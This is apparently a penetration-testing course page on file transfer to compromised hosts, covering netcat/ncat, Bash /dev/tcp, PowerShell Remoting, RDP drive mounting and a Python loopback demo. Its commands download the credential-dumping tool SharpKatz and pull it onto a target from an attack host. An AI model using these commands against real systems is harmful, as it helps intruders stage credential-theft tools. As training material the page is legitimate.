# File Transfer with Netcat and Ncat

### Netcat - compromised machine - listening on port 8000

```bash
nc -l -p 8000 > SharpKatz.exe
```

### Ncat - compromised machine - listening on port 8000

With Ncat we specify `--recv-only` so that the connection is closed once the file transfer is finished.

```bash
ncat -l -p 8000 --recv-only > SharpKatz.exe
```

### Netcat - attack host - sending file to compromised machine

From our attack host, we connect to the compromised machine on port 8000 using Netcat and feed the file `SharpKatz.exe` to Netcat on standard input. The option `-q 0` tells Netcat to close the connection as soon as it reaches end of file on its input. The receiver only knows the transfer is complete when the connection closes, so this is how we know the file was fully transferred. Not every Netcat build accepts `-q`; the OpenBSD variant uses `-N` to shut down the socket after EOF on standard input.

```bash
wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe

# Then send it with the original Netcat
nc -q 0 192.168.49.128 8000 < SharpKatz.exe
```

### Ncat - attack host - sending file to compromised machine

With Ncat we use `--send-only` instead of `-q`. In both connect and listen modes, `--send-only` makes Ncat exit once its input is exhausted.

```bash
wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe

# Then send it with Ncat
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
```

Whichever tool is used, compare a hash of the file on both ends (for example with `sha256sum`) before running it: a transfer that ends early leaves a truncated binary, not an error message.

---

Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer. This is useful where a firewall blocks inbound connections to the compromised machine but allows outbound ones.
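Both Netcat patterns above depend on one detail: the receiving side has no length field or checksum, so the only "transfer complete" signal it gets is the sender closing (half-closing) the connection, which is exactly what `-q 0` and `--send-only` add. The script below, added here as an example and not code from the original page, models the push pattern (target listens, attack host sends) and the pull pattern (attack host listens with the file as input, target reads to EOF, as `nc IP 443 > file` or `cat < /dev/tcp/IP/443 > file` would) on loopback with plain sockets, then checks the SHA-256 on both ends. The addresses, ephemeral ports and the patterned payload standing in for `SharpKatz.exe` are constructed for the demo.

```python
"""Loopback model of the Netcat/Ncat file-transfer patterns from the page.

  push: target listens (nc -l -p 8000 > file), attack host connects and sends
        (nc -q 0 IP 8000 < file / ncat --send-only IP 8000 < file)
  pull: attack host listens with the file as input (nc -l -p 443 -q 0 < file),
        target connects and reads (nc IP 443 > file / cat < /dev/tcp/IP/443 > file)

Ports, addresses and payload are constructed for the demo; everything runs on
127.0.0.1 and needs only the Python standard library.
"""
import hashlib
import socket
import threading
from typing import Tuple

CHUNK = 64 * 1024


def sha256_hex(data: bytes) -> str:
    """Digest compared on both ends, as sha256sum / Get-FileHash would be."""
    return hashlib.sha256(data).hexdigest()


def send_then_finish(sock: socket.socket, data: bytes) -> None:
    """Send the whole payload, then half-close the write side.

    This is what `nc -q 0` / `ncat --send-only` do once stdin hits EOF: the
    FIN is the only "transfer complete" signal the receiver gets. Without it
    the receiving `nc` sits in recv() forever.
    """
    sock.sendall(data)
    sock.shutdown(socket.SHUT_WR)


def receive_until_eof(sock: socket.socket) -> bytes:
    """Read until the peer closes, like `nc -l > file` or `--recv-only`."""
    chunks = []
    while True:
        chunk = sock.recv(CHUNK)
        if not chunk:            # b"" means the peer sent FIN: file is complete
            return b"".join(chunks)
        chunks.append(chunk)


def _listen_on_free_port() -> Tuple[socket.socket, int]:
    """Bind to 127.0.0.1:0 so the kernel picks an unused port (demo only)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def push(data: bytes) -> Tuple[bytes, str]:
    """Inbound pattern: the (simulated) target listens, the attack host sends."""
    srv, port = _listen_on_free_port()
    received = {}

    def target_side():
        conn, _ = srv.accept()
        with conn:
            received["data"] = receive_until_eof(conn)
        srv.close()

    t = threading.Thread(target=target_side)
    t.start()
    with socket.create_connection(("127.0.0.1", port), timeout=5) as attack_host:
        send_then_finish(attack_host, data)
    t.join(timeout=5)
    return received["data"], sha256_hex(received["data"])


def pull(data: bytes) -> Tuple[bytes, str]:
    """Outbound pattern (inbound firewalled): the attack host listens with the
    file as input, the target connects and reads to EOF."""
    srv, port = _listen_on_free_port()

    def attack_host_side():
        conn, _ = srv.accept()
        with conn:
            send_then_finish(conn, data)
        srv.close()

    t = threading.Thread(target=attack_host_side)
    t.start()
    with socket.create_connection(("127.0.0.1", port), timeout=5) as target:
        received = receive_until_eof(target)
    t.join(timeout=5)
    return received, sha256_hex(received)


if __name__ == "__main__":
    # Constructed stand-in for SharpKatz.exe: an MZ header plus 1 MiB of patterned bytes.
    payload = b"MZ" + bytes(range(256)) * 4096
    expected = sha256_hex(payload)
    for name, transfer in (("push", push), ("pull", pull)):
        got, digest = transfer(payload)
        print(f"{name}: {len(got)} bytes, hash matches: {digest == expected}")
```

To see why the close matters, drop the `shutdown(SHUT_WR)` call in `send_then_finish`: the receiving side then blocks in `recv()` indefinitely, which is the same hang you get from a listening `nc` when the sender was started without `-q 0`, `-N` or `--send-only`.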
### Attack host - sending file as input to Netcat

```bash
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

### Compromised machine - connect to Netcat to receive the file

```bash
nc <IP> <PORT> > SharpKatz.exe
```

We can do the same with Ncat.

### Attack host - sending file as input to Ncat

```bash
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

### Compromised machine - connect to Ncat to receive the file

```bash
ncat <IP> 443 --recv-only > SharpKatz.exe
```

---

If we don't have Netcat or Ncat on the compromised machine, Bash can still open TCP connections through the `/dev/tcp/<host>/<port>` pseudo-path. It is not a real file: when Bash sees a redirection to or from `/dev/tcp/host/port`, it opens a TCP connection to `host:port` and attaches it to the redirected file descriptor, which is enough for a file transfer. The path is case sensitive (`/dev/TCP` does not work) and the feature belongs to Bash itself, so a target whose only shell is `dash` will not have it.

### Attack host - sending file as input to Netcat or Ncat

```bash
# Either of the two, depending on which tool is installed on the attack host
sudo nc -l -p 443 -q 0 < SharpKatz.exe
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

### Compromised machine - connecting to Netcat using /dev/tcp to receive the file

```bash
cat < /dev/tcp/<IP>/443 > SharpKatz.exe
```

---

# PowerShell Session File Transfer

There may be scenarios where HTTP, HTTPS, or SMB are unavailable. If that is the case, we can use `PowerShell Remoting`, aka `WinRM`, to perform file transfers. PowerShell Remoting lets us run scripts or commands on a remote computer through PowerShell sessions. Enabling PowerShell Remoting creates an HTTP listener on `TCP/5985`; an HTTPS listener on `TCP/5986` can be added once the host has a suitable certificate. To create a PowerShell Remoting session on a remote computer we need administrative access, membership in the Remote Management Users group, or explicit permissions for PowerShell Remoting in the session configuration.

### From DC01 - Confirm WinRM port TCP 5985 is open on DATABASE01

We have a session as `Administrator` on `DC01`, the user has administrative rights on `DATABASE01`, and PowerShell Remoting is enabled.
Let's use `Test-NetConnection` to confirm we can connect to WinRM.

```powershell
whoami
htb\administrator
hostname
DC01
```

```powershell
Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True
```

### Create a PowerShell Remoting Session to DATABASE01

Because this session already has privileges over `DATABASE01`, we don't need to specify credentials. In the example below, a session is created to the remote computer named `DATABASE01` and stored in the variable `$Session`.

```powershell
$Session = New-PSSession -ComputerName DATABASE01
```

### Copy samplefile.txt from our localhost to the DATABASE01 Session

```powershell
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
```

### Copy DATABASE.txt from DATABASE01 Session to our localhost

```powershell
Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
```

The `-ToSession` and `-FromSession` parameters of `Copy-Item` were introduced in PowerShell 5.0, so they require a 5.0 or later host. Because the copy travels inside the session, the same session can verify it: run `Get-FileHash` locally and again through `Invoke-Command -Session $Session` and compare the two digests.

# RDP

We can transfer files over RDP by copying and pasting. We can right-click and copy a file on the Windows machine we connect from and paste it into the RDP session, or the other way round. When connecting from Linux we can use `xfreerdp` or `rdesktop`. Both support copying between the local machine and the RDP session, but there are scenarios where this does not work as expected, for example when clipboard redirection is disabled by policy on the target.

As an alternative to copy and paste, we can mount a local resource on the target RDP server: `rdesktop` or `xfreerdp` can expose a local folder inside the remote RDP session.
### Mounting a Linux folder using rdesktop

```bash
rdesktop <IP> -d <DOMAIN> -u administrator -p '<PASSWORD>' -r disk:linux='/home/user/rdesktop/files'
```

### Mounting a Linux folder using xfreerdp

```bash
xfreerdp /v:<IP> /d:<DOMAIN> /u:administrator /p:<PASSWORD> /drive:linux,/home/plaintext/htb/academy/filetransfer
```

In both cases the folder appears inside the session as a redirected drive named `linux`, reachable from the target as `\\tsclient\linux`, so files can be copied in either direction with Explorer or with `copy \\tsclient\linux\<file> .` from a command prompt.